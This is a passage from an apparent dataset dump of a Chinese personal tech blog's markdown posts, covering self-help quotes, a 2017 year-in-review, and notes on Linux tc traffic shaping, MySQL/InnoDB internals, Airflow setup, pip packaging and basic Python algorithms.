**培养一些积极健康的习惯,也许会一生受益。**\n\n> **真正的野心是满怀自信地面对生活,对一切阻碍视而不见。这注定是场孤独的战役,因为你要削弱锋芒,要“成为最好的自己,一战到底,不管局势如何演变”。这些绝不仅仅是响亮的口号。要记住,成事,而非成名。** \n\n> 这场考验来得悄无声息又严酷无比,他在其中练就刚毅而坚韧的性格,**创新却不仓促,勇敢却不鲁莽。这才是真正的领导者。**\n\n## 第二部分:成功\n\n### 无论成就如何,依然严控自我\n\n> **不具备美德、不经过训练的人“难以承受好运的嘉赏”**\n\n> 对一位公司总裁伤害最大的并不是人们常说的酒精成瘾,而是自我。\n\n> 成功有毒,与之周旋必须保持清醒。\n\n### 以学生的姿态\n\n> 通常情况下,我们自恃其才,情愿蜷在舒适区内,以自知之明自我满足(从不质疑自己,也没想过继续学习)\n\n### 别给自己讲故事\n\n> 从不陷入幻想的圈套。\n\n> **满怀渴望时,绝不试图从他人经验中复制成功;目标实现时,绝不佯装一切事情都尽在掌控。**根本没有什么伟大的传说。一路走来的人是你,你心里清楚都发生过什么。\n\n> **不求一旦浮爵,不忘立身之本。**\n\n### 你看重什么\n\n> ** 知道自己想要什么是智慧和成熟的开始。**\n\n> 自我引起嫉妒,嫉妒是骨中的朽烂。自我欺人瞒己,丰功伟业也渐渐溃于蚁穴。\n\n> **生活不是为了和其他人较劲,意义不在于拥有的比别人更多。生活是做自己,做到极致,不为正轨之外的任何事情而妥协。生活是到达你想到达的彼岸,完成你想完成的最好。仅此而已,不多一点也不少一点。**\n\n> 是时候坐下想想在这大千世界里,你最看重什么。随后抛下剩余,只为它乘风破浪。没有它,成功也来得不愉悦、不完整,甚至不长久。\n\n> **生活是妥协,而自我是放肆。**\n\n> **大声拒绝在不属于自己的赛场竞技,才能无视那些所谓“成功人士”,因为他们的成功——至少大多数情况下——与你无关,甚至与他们自己都无关;才能心如止水,像塞涅卡说的那样知道自己从何而来,去向何处。**\n\n> 其实人人都会陷入一种错觉之中,仿佛只有自己得到一些其他人都有的东西时才能真正感到幸福。想要意识到这种错觉不过是虚无缥缈就必须历经几次遍体鳞伤。偶尔,我们发现自己被逼到了无名之地,甚至说不出背后原因几何。这时及时悬崖勒马也是一种勇气的表现。\n\n> 想清楚你为何追逐,再想清楚你在追逐什么。\n\n> 忽略所有打乱步伐的干扰,让他人因你的所有而垂涎。这才是真正的独立。\n\n### 权力、控制、偏执\n\n> **如果你医不好自己这把坏脾气,那离发疯失控也就不远了。**也许正是因为富兰克林很会控制自己的愤怒吧,他觉得写下这封信已经足够了,直到最后也没有把信寄出去。\n\n> **所谓同情,就是当你看着一个低能儿企图欺负别人,却最后只伤了自己。**\n\n> 他蔑视这个国家,却也正需要从中得到掌声和支持。”法国人民在他眼里不过是任人摆弄、低人一等的傀儡,所有不能无条件支持他的人,便都是叛徒。\n\n> 一个明智的人要时常以能力有限、权责有度来自省。\n\n> **凡事都想争第一的心态形成可悲的反馈回路,让其他人得此机会伤害、打击我们。旁观者反倒能看透这种心态:一张虚伪、混乱和不安全感的面具罢了。**\n\n### 管好自己\n\n> **当你成为行业内最成功的人后,肩负的责任也有所改变。要做的越来越少,要想的却越来越多。这就是领导力的本质。**\n\n> **如果你忙于扮演“大佬”的角色而眼光不能放远,谁又能替你高瞻远瞩呢?**\n\n> 重要的是,在工作把你生吞活剥之前抓紧时间学习如何管理自己和他人。那些事无巨细的管理者往往都被自我占了上风,很快就要迎接压倒骆驼的最后一根稻草。\n\n### 警惕“恋我癖”\n\n> 自我需要荣誉来正名;自信却有耐心等待,不在乎外界认同,只专注于手上的工作。\n\n### 冥想无限\n\n> 一沙一世界,一花一天堂。掌中握无限,刹那是永劫。\n\n### 不管未来几何,严控自我\n\n> 没有一条路可以绕开挫折,该来的迟早都会降临。\n\n> 不管前路几何,自我都是敌人。自我让人步履维艰,让失败的阴云久久不散。\n\n> 不让自我与成功相伴;用力推开眼前的阴云,逃脱自我的纠葛。\n\n## 后记\n\n> 正面对峙自我不是件容易的差事。首先,要承认自我的存在。然后,迫使它接受审视和批评。\n\n> 任何情况下,只要下定了决心,本身就已经是对失败的一记重击。只有决心当然不够,但这是一个很好的开始。\n\n> **学着打磨心性,压制内心的冲动——不仅是为人体面的道德要求,还会让你变得更出色,陪你渡过欲望苦海中的大风大浪。**"
},
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.7361853718757629,
"avg_line_length": 10.239999771118164,
"blob_id": "46791c263c989aa9e39d4ee32b69b81e62083624",
"content_id": "b86823db905bfc9bfcc780c9b0a4038199cc97b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1249,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 50,
"path": "/source/_posts/2017年度总结.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 2017年度总结\ndate: 2018-01-02 15:12:50\ncategories: 总结\ntags: [2017]\n---\n\n春去秋来,一年很快就过去了。在过去的2017年,自己经历了一些成长的烦恼,同时也开始重新审视和思考自己;\n\n### 一、工作\n\n工作上最大的变化就是从视频工具到用户工具的转变,从2016年7或8月份开始接触、学习使用Unity到2017年4月份,大半年时间的学习和使用。接下来的大半年时间都是在做用户工具相关的产品。\n\n今年大部分时间都是在用户工具上,主要技术增长上是chrome extension开发;\n\n### 二、生活\n\n很庆幸有一个可爱的孩子,现在逐渐可以走路了,咿咿呀呀说些话。\n\n每天下班回家看到他睡觉的样子,觉得自己再辛苦也是值得的。\n\n一个人在家带孩纸真是挺累的,辛苦老婆了!\n\n### 2018年规划\n\n** 习惯培养: **\n\n1)以前的学习工作等等缺少总结思考,2018年做好总结。\n\n2)写博客,每月>=1篇。\n\n3)用好笔记\n\n** 个人学习: **\n\n1)MySql\n\n2)UNIX环境高级编程\n\n3)架构及未来 [在读]\n\n4)知识管理方面\n\n5)产品方面 [极客时间:邱岳]\n\n** 生活: **\n\n1)情绪控制\n\n2)带家人旅行"
},
{
"alpha_fraction": 0.6687023043632507,
"alphanum_fraction": 0.7603053450584412,
"avg_line_length": 29.6875,
"blob_id": "46e1c9bdea2e00a588393ddb189657528ee666fa",
"content_id": "89104341a1dd72265296ac5aeabedb2ff65a800d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3387,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 64,
"path": "/source/_posts/tc.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\nlayout: linux\ntitle: Linux TC限流\ndate: 2018-03-27 21:52:15\ncategories: Linux\ntags: [Linux,TC,QOS]\n---\n流量控制的一个基本概念是队列(Qdisc),每个网卡都与一个队列(Qdisc)相联系, 每当内核需要将报文分组从网卡发送出去, 都会首先将该报文分组添加到该网卡所配置的队列中, 由该队列决定报文分组的发送顺序。因此可以说,所有的流量控制都发生在队列中.\n\n在Linux中,流量控制都是通过TC这个工具来完成的。通常, 要对网卡进行流量控制的配置,需要进行如下的步骤:\n- 为网卡配置一个队列;\n- 在该队列上建立分类;\n- 根据需要建立子队列和子分类;\n- 为每个分类建立过滤器。\n\nLinux TC中的队列有CBQ、HTB等,CBQ 比较复杂,不容易理解。HTB(HierarchicaIToken Bucket)是一个可分类的队列, 与其他复杂的队列类型相比,HTB具有功能强大、配置简单及容易上手等优点。\n\n### 一、创建队列\n```\ntc qdisc add dev eth0 root handle 1: htb default 11\n\n”dev eth0 表示要操作的网卡为eth0。\n”root 表示为网卡eth0添加的是一个根队列。\n”handle 1: 表示队列的句柄为1:。\n”htb 表示要添加的队列为HTB队列。\n”default 11 是htb特有的队列参数,意思是所有未分类的流量都将分配给类别1:11。\n```\n### 二、创建分类\n```\ntc class add dev eth0 parent 1: classid 1:1 htb rate 40mbit ceil 40mbit\ntc class add dev eth0 parent 1: classid 1:12 htb rate 10mbit ceil 10mbit\n\n”parent 1:”表示类别的父亲为根队列1:。\n”classid1:11″表示创建一个标识为1:11的类别,\n”rate 40mbit”表示系统将为该类别确保带宽40mbit,\n”ceil 40mbit”,表示该类别的最高可占用带宽为40mbit。\n”burst 40mbit”,表示该类别的峰值可占用带宽为40mbit。\n```\n### 三、设置过滤器\n```\ntc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip dport 80 0xffff flowid 1:11\ntc filter add dev eth0 prtocol ip parent 1:0 prio 1 u32 match ip dport 25 0xffff flowid 1:12\n\n”protocol ip”表示该过滤器应该检查报文分组的协议字段。\n”prio 1″ 表示它们对报文处理的优先级是相同的,对于不同优先级的过滤器, 系统将按照从小到大的优先级。顺序来执行过滤器, 对于相同的优先级,系统将按照命令的先后顺序执行。这几个过滤器还用到了u32选择器(命令中u32后面的部分)来匹配不同的数据流。以第一个命令为例,判断的是dport字段,如果该字段与Oxffff进行与操作的结果是80\n”flowid 1:11″ 表示将把该数据流分配给类别1:1 1。\n```\n### 四、配合iptables\nTC作用:建立数据通道, 建立的通道有数据包管理方式, 通道的优先级, 通道的速率(这就是限速)\niptables作用:决定哪个ip 或者 mac 或者某个应用, 走哪个通道.\n\n### 五、示例\n限制网卡eth0 10Mbps\n```\ntc qdisc add dev eth0 root tbf rate 10mbit burst 10kb lat 400.0ms\ntc -s qdisc ls dev eth0\n```\n\n六、参考\n[Linux tc QOS 详解][1]\n[Linux 流量控制实施指南][2]\n\n[1]: http://www.wy182000.com/2013/04/15/linux-tc-%E8%AF%A6%E8%A7%A3/ \"Linux tc QOS 详解\" \n[2]: http://www.wy182000.com/2013/04/17/linux-%E6%B5%81%E9%87%8F%E6%8E%A7%E5%88%B6%E5%AE%9E%E6%96%BD%E6%8C%87%E5%8D%97/\t\"Linux 流量控制实施指南\" \n"
},
{
"alpha_fraction": 0.8243727684020996,
"alphanum_fraction": 0.8401433825492859,
"avg_line_length": 24.381818771362305,
"blob_id": "24f8103c1c3c1e028ad6f253ce302f41ae1c52ea",
"content_id": "398f5433ceb29b42764fe0ef91bc6a172a84e1da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3499,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 55,
"path": "/source/_posts/msyql-index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySQL-索引概述\ndate: 2018-10-25 11:40:33\ncategories: MySQL\ntags: [MySQL,聚集索引,辅助索引]\n---\n## 前言\n索引是应用程序开发和设计的一个重要的方面。若索引太多,会影响应用程序的性能;若没有索引,对查询性能又有影响。所以,需要找到一个平衡点,这对应用程序设计、开发至关重要。\n\n## InnoDB索引概述\n### 常见的索引分类\n- B+Tree索引\n- 全文索引\n- 哈希索引\n> InnoDB存储引擎支持的哈希索引是自适应的,InnoDB会根据表的使用情况,自动生成Hash索引,不能认为干预。\n\n## B+Tree索引\nB+Tree索引是传统意义上的索引结构,是目前关系型数据库使用的最为常用和有效的索引类型。\n> B+Tree中的B不是二叉(binary),而是代表平衡(balance),因为B+Tree是从平衡二叉树演化过来的,但不是二叉树。\n\nB+Tree索引并不能找到给定键的具体行,只能找到查找数据行所在的页,然后再通过将页读入内存,在内存中查找,最后得到查找的数据。\n\n数据中B+Tree索引分为聚集索引和辅助索引,不管是聚集还是辅助索引,内部都是基于B+Tree的,即高度平衡的,叶子节点存放所有数据。聚集索引和辅助索引的主要区别是叶子节点是否存放一整行数据。\n\n### 聚集索引\n聚集索引就是按表的主键构造一颗B+Tree,叶子节点存放表的行数据。所以,叶子节点也称为数据页。同时每个数据页通过双向链表连接。\n\n聚集索引的存储并不是物理上连续的,而是逻辑上连续的。\n- 一是因为页是通过双向链表链接的,数据页是按主键顺序排序。\n- 二是因为每个数据页中的记录行也是通过双向链表维护的,物理上也可以不按主键顺序存储。\n\nInnoDB引擎的表数据是通过主键索引结构来组织的,叶子节点存放行数据,是一种B+Tree文件组织。\n\n可以快速通过主键定位数据,在创建表时,无论是否有明确的主键,InnoDB都会为表自动创建一个主键索引。\n\n实际使用过程中,当通过主键来查询某些数据时,先通过B+Tree快速定位到叶子节点地址;由于叶子节点是磁盘块(4k)大小的整数倍(4x4=16k,InnoDB的页大小为16k),这样通过连续地址快速I/O将整个页内容加载到内存中,然后在内存中筛选出目标数据。\n\n由于InnoDB的主键索引的存储是按主键的顺序存储的,所以InnoDB的主键索引是聚集索引,并且每张表只允许一个聚集索引;\n\n### 辅助索引\n\n辅助索引的叶子节点并不包含行记录的全部数据,二是包含一个书签,书签就是相应行数据的聚集索引键。因此,还需要通过聚集索引来获取行的全部数据。\n\n除了主键索引以外的索引都称为InnoDB的辅助索引,也称为二级索引。\n\n辅助索引的存储结构也是B+Tree,和主索引不同的是,叶子节点存储的不是行数据,而是主键值,所以,通过辅助索引定位到目标数据后(其实是目标数据的id),还需要通过主键,再通过主索引得到真正的目标数据;\n\n### 哈希索引\n时间复杂度O(1),不只是存在于索引中,几乎每个应用程序都应用到这个数据结构。\n\nInnoDB存储引擎使用哈希算法来对字典进行查找,使用链表方式解决哈希ch\n\n## 全文检索\n\n全文检索使用倒排索引来实现"
},
{
"alpha_fraction": 0.7209466695785522,
"alphanum_fraction": 0.7463793754577637,
"avg_line_length": 28.5,
"blob_id": "eb56bd82161098e0c17427f517f668fec0ce44db",
"content_id": "b3f2464ec664d1a5efbec8bab95f7cb0c60f401a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3623,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 96,
"path": "/source/_posts/airflow.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Airflow安装使用\ndate: 2018-06-29 22:31:21\ncategories: 工具\ntags: [airflow,crontab]\n---\n### 介绍\nAirflow 是 Airbnb 使用Python开发的用于工作流管理的开源项目,简单说就是管理和调度定时任务,可以替代Linux的crontab。如果你的crontab很多,不好管理,那么airflow对你来说就是救星。它自带简洁的UI,现在 Apache 下做孵化,地址是https://github.com/apache/incubator-airflow\n\n### 安装\n> 由于airflow是使用Python开发的,所以要安装airflow,需要Python环境,Python2 或者Python3都可以。\n> 最好使用VirtualEnv来安装,因为airflow可能依赖了一些Python库和你的Python环境中的某个库的版本冲突,我就是因为这个搞了差不多一天时间。\n\n安装好Python环境和virtualenv后,开始安装airflow\n```\n# 1)首先创建并进入airflow的工作目录下\n$ cd /path/to/my/airflow/workspace\n$ virtualenv -p `which python3` venv\n$ source venv/bin/activate\n(venv) $ \n# 2)安装airflow\n(venv) $ pip install airflow\n# 3)设置AIRFLOW_HOME\n(venv) $ cd /path/to/my/airflow/workspace\n(venv) $ mkdir airflow_home\n(venv) $ export AIRFLOW_HOME=`pwd`/airflow_home\n# 4)测试airflow\n(venv) $ airflow version\n# 5)初始化airflow数据库,默认airflow使用SQLite,线上环境可以使用mysql\n(venv) $ airflow initdb\n# 6)启动airflow webserver,airflow默认监听8080端口,Web Server启动后,就可以通过IP:Port(8080)访问了。\n(venv) $ airflow webserver\n```\n### 创建DAG\n1)在airflow_home中创建dags目录,目录结构如下:\n```\n(venv) ➜ airflow_home tree\n.\n├── airflow.cfg\n├── airflow.db\n├── airflow-webserver.pid\n├── dags\n│ ├── hello_world.py\n│ └── __pycache__\n│ └── hello_world.cpython-36.pyc\n├── logs\n│ ├── hello_world\n│ │ ├── dummy_task\n```\n2)的dags目录下,创建一个dag,hello_world.py\n```\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\n\ndef print_hello():\n print (\"Hello World...\")\n return 'Hello world!'\n\ndag = DAG('hello_world', description='Simple tutorial DAG',\n schedule_interval='*/1 * * * *',\n start_date=datetime(2018, 6, 29), catchup=False)\n\ndummy_operator = DummyOperator(task_id='dummy_task', retries=3, dag=dag)\n\nhello_operator = PythonOperator(task_id='hello_task', python_callable=print_hello, dag=dag)\n\ndummy_operator >> hello_operator\n```\n### 启动DAG\n```\n(venv) $ airflow scheduler\n```\n\n访问URL【http://ip:8080/admin/】就可以看到上图airflow控制台,里面很多默认的dag,也有我们刚才创建hello_world DAG也在里面,但需要点击红框里的按钮,airflow才会调度dag执行。\n\n### AirFlow相关命令\n```\n# print the list of active DAGs\nairflow list_dags\n# prints the list of tasks the \"tutorial\" dag_id\nairflow list_tasks tutorial\n# prints the hierarchy of tasks in the tutorial DAG\nairflow list_tasks tutorial --tree\n# 以debug模式,deamon方式运行web server\nairflow webserver --debug &\n\n ### 测试DAG\n# testing print_date\nairflow test hello_world hello_task 2018-06-29\n```\n### 参考资料\n[Apache Airflow (incubating) Documentation](https://airflow.incubator.apache.org/index.html)\n[Get started developing workflows with Apache Airflow](http://michal.karzynski.pl/blog/2017/03/19/developing-workflows-with-apache-airflow/)\n[使用 airflow 替代你的 crontab](http://sanyuesha.com/2017/11/13/airflow/)"
},
{
"alpha_fraction": 0.809960663318634,
"alphanum_fraction": 0.8222804665565491,
"avg_line_length": 23.455127716064453,
"blob_id": "672a9d1a7ca71a40d770955e2c62b305e5a772c6",
"content_id": "da25d800afa5e440ac1a5ab9e96b1f5ab1e91b20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8313,
"license_type": "no_license",
"max_line_length": 242,
"num_lines": 156,
"path": "/source/_posts/mysql-arch.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySQL-概述\ndate: 2018-09-18 17:08:07\ncategories: MySQL\ntags: [MySQL, Undo Log, Redo Log, InnoDB]\n---\n## 数据库与实例\n\n- 数据库是文件集合,依照某种数据模型组织起来并存储于二级存储器中的数据集合\n- 数据库实例是程序,是存在于操作系统和用户之间的数据管理软件。用户对数据库的任何操作都是在数据库实例下进行的,用户程序必须通过数据库实例和数据库交互。\n\n## MySQL存储引擎\n### InnoDB存储引擎\n支持事务,主要设计目标是面向在线事务处理(OLTP)应用。行锁设计,支持外键,并支持非锁定读,支持独立的表ibd文件。从5.5.8开始成为MySQL默认的存储引擎。\n\nInnoDB通过多版本并发控制(MVCC)来提高并发性。并实现了SQL标准的4种隔离级别,默认为RR(Repeatable Read)。\n\n在表的数据存储上,InnoDB采用聚集索引的方式,所以每个表中的数据都是按主键顺序存放的。如果没有显示定义主键,InnoDB会为每行创建一个6字节的row_id作为主键。\n\n### MyISAM存储引擎\n不支持事务、表锁设计,支持全文索引。在MySQL 5.5.8之前是MySQL默认的存储引擎。\n\n## InnoDB存储引擎关键特性\n- 插入缓冲(Insert Buffer)\n- 两次写(Double Write)\n- 自适应哈希索引(Adaptive Hash Index)\n- 异步IO(Async IO)\n- 刷新临近页(Flush Neighbor Page)\n\n### 插入缓冲(Insert Buffer)\n1)主要功能:\n 提高非唯一的辅助索引的插入性能\n \n2)前提条件\n- 辅助索引(或者二级索引)\n- 非唯一索引\n\nMySQL在进行插入操作时,数据页是按聚集索引(主键、主索引)顺序存放的,但对于非聚集的叶子节点(辅助索引的叶子节点存的是主键,查询时需要进行二次查找)的插入,就不是顺序的了,这时就需要离散的访问非聚集索引页,正是由于这样的随机读取的存在,导致了插入性能的下降。\n\n为了解决辅助索引随机读取导致的性能问题,MySQL引入了Insert Buffer的设计,大概的思想是通过使用缓存,将多次对索引页的操作,合并成一次来提供性能。对非聚集索引的插入和更新操作,不会每次都直接插入到索引页中,而是先判断索引页是否在缓存池中,在,就直接插入,不在,则先放到一个Insert Buffer对象中,然后再以一定的频率和情况来对Insert Buffer和辅助索引页子节点的合并,这样,通常可以将多个插入操作合并到一个操作中,这样就大大提高了非聚集索引的插入性能。\n\n### 两次写(Double Write)\n主要功能:提高数据页的可靠性\n\n### 自适应哈希索引(Adaptive Hash Index)\n\n主要功能:提高索引页的检索速度\n\nInnoDB引擎自动优化,无需人工干预\n\n### 异步IO(Async IO)\n\n主要功能:提高磁盘读写性能\n\n合并IO请求,提高IOPS性能。\n\n### 刷新临近页(Flush Neighbor Page)\n\n主要功能:利用AIO,合并IO请求\n\n当刷新一个脏页时,InnoDB存储引擎会该页所在区(extent)的所有页,如果是脏页,则一起进行刷新。\n\n## InnoDB日志\nInnoDB引擎有两个非常重要的日志\n- 一个是undo log,\n- 另外一个是redo log\n\nundo log用来保证事务的原子性以及InnoDB的MVCC,redo log用来保证事务的持久性。\n\n### Undo Log(逻辑日志)\nUndo log一直都是事务、多版本并发控制(MVCC)的核心组件,当我们对数据记录做了修改操作时,就会记录undo log。\n#### 核心功能:\n\n- 事务回滚\n\n 可以认为当delete一行记录时,undo log中记录的是一条对应的insert语句,当执行一条update语句时,undo log中记录的是与其相反的update语句。所以,当执行rollback时,可以从undo log的逻辑记录中获取相应的内容进行回滚。\n \n- 非锁定一致性读(MVCC多行版本控制)\n\n 行多版本控制也是通过undo log来实现的,当读取某一行被某个事务锁定时,可以通过undo log获取行在事务锁定之前的数据,从而提供行版本信息,实现非锁定一致性读取。\n\n 每条undo log也会指向更早版本的undo log,从而形成一条更新链。通过这个更新链,不同事务可以找到其对应版本的undo log,组成old version记录,这条链就是记录的history list。\n\nundo log的也会产生redo log记录行的物理变化\n\n根据提交事务的行为不同,undo log 分为update undo log 和 insert undo log\n- insert undo log\n因为,insert操作只对事务本身可见,所以,insert undo log在事务提交后,就可以直接删除。\n- update undo log\nupdate undo log是update 和 delete操作产生的undo log。\n因为是对已经存在的记录进行操作,并且update undo log还被MVCC使用,所以,当事务提交的时候,不能立刻删除update undo log。而是等待purge线程离线删除。\n\n### redu log(物理日志)\n\n和其他数据库一样,InnoDB记录对数据文件的物理更改,并保证总是日志先行(即WAL)。\n\n#### 作用:数据恢复\nredo log记录的是数据页的物理变化,是保证事务一致性非常重要的手段,InnoDB通过redolog保证已经commit的数据一定不会丢失,也就是事务隔离级别的持久性实现。\n \n#### 跟二进制日志的区别:\n \n1)二进制日志会记录所有跟MySQL有关的日志,包括InnoDB、MyISAM...,而Redo Log只记录存储引擎本身的事务日志\n\n2)记录的内容不同,二进制日志记录的是一个事务的具体操作内容,即是逻辑日志,Redo Log记录的是每个页(page)更改的物理情况。\n\n3)写入时间不同。二进制日志仅在事务提交前进行提交,无论该事务多大,只写磁盘一次;而在事务进行过程中,不断有Redo Log条目写入到Redo Log中。\n\n\n## 索引组织表\n在InnoDB存储引擎中,表都是按主键顺序组织存放的,这种存储方式组织的表称为索引组织表。\n\n在InnoDB存储引擎中,每个表都有一个主键,如果没有显示定义主键,InnoDB会按下面的方式选择或创建主键\n- 如果有非空唯一索引,则选该列为主键\n- 否则,InnoDB会自动创建一个6字节的_rowid作为主键\n\n## InnoDB逻辑存储结构\nInnoDB所有数据都存储在表空间中(tablespace)。表空间又由段(segment)、区(extent)和页(page)组成。\n\n如果用户启用innodb_file_per_talbe,则每张表的数据可以单独放在一个表空间中。\n\n表空间是由段组成的,常见的段有数据段、索引段、回滚段。\n\nInnoDB的表是由索引组织的,所以数据也是索引,索引也是数据。数据段即是B+Tree的叶子节点,索引段即是B+Tree的非叶子节点。对段的管理是由InnoDB引擎自身管理的。\n\nInnoDB的区是由连续的页组成的,在任何情况下区的大小都是1M,默认情况下,InnoDB的页大小为16k,每个区64个页组成。\n\n页是InnoDB存储引擎磁盘管理的最小单位,常见的页类型有:\n- 数据页\n- Undo 页\n- 系统页\n- 插入缓冲位图页\n- 插入缓冲空闲列表页\n\nInnoDB存储引擎是面向行的,每页存放的行记录也是硬性定义的。\nInnoDB行记录格式:\n- Compact (MySQL5.0引入)\n- Redundant (MySQL5.0之前默认)\n- Compressed\n- Dynamic\n\nCompressed 和 Dynamic是新的行格式,对于存放Blob类型的数据采用完全溢出的方式,在数据页中只存放20字节的指针,而之前的Compact 和 Redundant会存放768字节的前缀。\n\n### 行溢出数据 \nInnoDB存储引擎可以将一行记录的某些数据存储在数据页之外。一般认为大对象列类型的存储会把数据存储在页之外。\n\nInnoDB存储引擎Verchar类型的最大长度65535(实际上跟字符集有关),这是一行中所有verchar类型的长度总和。\n\n## MySQL分区\n\n### MySQL支持的分区类型\n- Range分区\n- List分区\n- Hash分区\n- Key分区\n\n当表中存在主键或者唯一索引时,分区列必须是唯一索引的一个组成部分。唯一索引是允许NULL值的,并且分区列只需要是唯一索引的一部分,不需要整个唯一索引列都是分区列。\n"
},
{
"alpha_fraction": 0.6370967626571655,
"alphanum_fraction": 0.6814516186714172,
"avg_line_length": 14.479166984558105,
"blob_id": "3d9ae9bed08df240a4cb7e039a54f7ff3f8a6d82",
"content_id": "b5d8d24efb3cd36007310b4c1dbae3c5488fb1d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 916,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 48,
"path": "/source/_posts/pip-package.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "title: 'pip安装python环境及打包'\ndate: 2014-06-26 09:37:53\ncategories: Python #文章文类\ntags: [pip,打包,python] #文章标签,多于一项时用这种格式\n---\n### 0.安装虚拟环境\n``` bash\npip install virtualenv\nvirtualenv env1\nsource env1/bin/activate\n```\n\t\n \n### 1. 将包依赖信息保存在requirements.txt文件\n\n``` bash\npip freeze > requirements.txt\n```\n \n### 2.根据依赖文件安装依赖\n\n```bash\npip install -r requirements.txt\n```\n \n### 3.根据依赖文件下载依赖包\n\n```bash\npip install -d /path/to/save/ -r requirements.txt\n```\n \n### 4.pip install -i指定pypi服务器\n\n```bash\npip install -i http://127.0.0.1:8000/ -r requirements.txt\n```\n \n### 5.打/opt/tools/env中所有依赖包到MyEnv.pybundle\n\n```bash\npip bundle MyEnv.pybundle -r pip-requires --no-index -f /opt/tools/env\n```\n \n### 6.使用MyEnv.pybundle安装依赖包\n\n```bash\npip install MyEnv.pybundle\n```\n\n"
},
{
"alpha_fraction": 0.4939349889755249,
"alphanum_fraction": 0.5482775568962097,
"avg_line_length": 19.81818199157715,
"blob_id": "b74daeb8035e0ae502ba10864eed2b89278a7c65",
"content_id": "5a9ec2bc82d1270eadca2ebf22865fdb9a954b09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2739,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 99,
"path": "/source/_posts/python_calc.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "title: 'Python几个算法实现'\ndate: 2014-07-08 13:02:53\ncategories: 算法 #文章文类\ntags: [算法,冒泡,python] #文章标签,多于一项时用这种格式\n---\n\n### 1.平衡点问题:\n比如int[] numbers = {1,3,5,7,8,25,4,20}; 25前面的总和为24,25后面的总和也是24,25这个点就是平衡点;假如一个数组中的元素,其前面的部分等于后面的部分,那么这个点的位序就是平衡点 \n要求:返回任何一个平衡点\n``` bash\ndef balance_point(li):\n start = 0\n end = len(li)-1\n sum_start = li[start]\n sum_end = li[end]\n while start < end:\n if sum_start == sum_end and end-start == 2:\n return start+1\n if sum_start < sum_end:\n start += 1\n sum_start += li[start]\n else:\n end -= 1\n sum_end += li[end]\n return -1\n```\n\t\n \n### 2.支配点问题: \n支配数:数组中某个元素出现的次数大于数组总数的一半时就成为支配数,其所在位序成为支配点;比如int[] a = {3,3,1,2,3};3为支配数,0,1,4分别为支配点; \n要求:返回任何一个支配点\n\n``` bash\ndef control_point(li):\n count_li = len(li)/2\n for i in li:\n if li.count(i) > count_li:\n return i\n\n return -1\n```\n \n### 3.python冒泡排序\n\n*冒泡*排序是最简单且稳定的排序方式,时间复杂度为O(n*n).下面主要使用Python range()函数控制循环,以及python返回多个值的性质,使得代码很简单\n\n```bash\ndef bubble_sort(li):\n for i in range(len(li)-1, 0, -1):\n for j in range(0,i):\n if li[j] > li[j+1]:\n li[j+1], li[j] = li[j], li[j+1]\n```\n\n### 4.输出1~N之间的素数\n\n**定义**:素数又叫质数[维基百科](http://zh.wikipedia.org/wiki/%E7%B4%A0%E6%95%B0)\n\n```bash\nfrom math import sqrt\n\n\ndef sushu_out(n):\n result = []\n for num in range(2, n):\n flag = True\n for j in range(2, int(sqrt(num))+1):\n if num % j == 0:\n flag = False\n break\n if flag:\n result.append(num)\n print result, len(result)\n```\n\n### 5.删除list中重复元素\n\n- l2 = list(set(l1))\n- l2 = {}.fromkeys(l1).keys()\n\n不改变原来顺序\n\n- l2 = sorted(set(l1),key=l1.index)\n- 遍历\n\n### 6.斐波那契数列\n\n**定义**:[斐波那契数列](http://zh.wikipedia.org/wiki/%E6%96%90%E6%B3%A2%E9%82%A3%E5%A5%91%E6%95%B0%E5%88%97)\n\n```bash\ndef fib(n):\n ret = []\n a = 0\n b = 1\n for i in range(0, n):\n ret.append(b) # 主意此处不能使用ret[i] = b ,会导致数组越界,因为ret现在为空,Java中数组初始化要给定长度,Python不同。\n a, b = b, a+b\n return ret\n```\n"
},
{
"alpha_fraction": 0.584617555141449,
"alphanum_fraction": 0.5871741771697998,
"avg_line_length": 38.667606353759766,
"blob_id": "11163badd0216446bbf20dc447c9659e8be6de58",
"content_id": "4aa442466001008c66f660698802ee8b40d243b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 15681,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 355,
"path": "/source/_posts/canal02.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
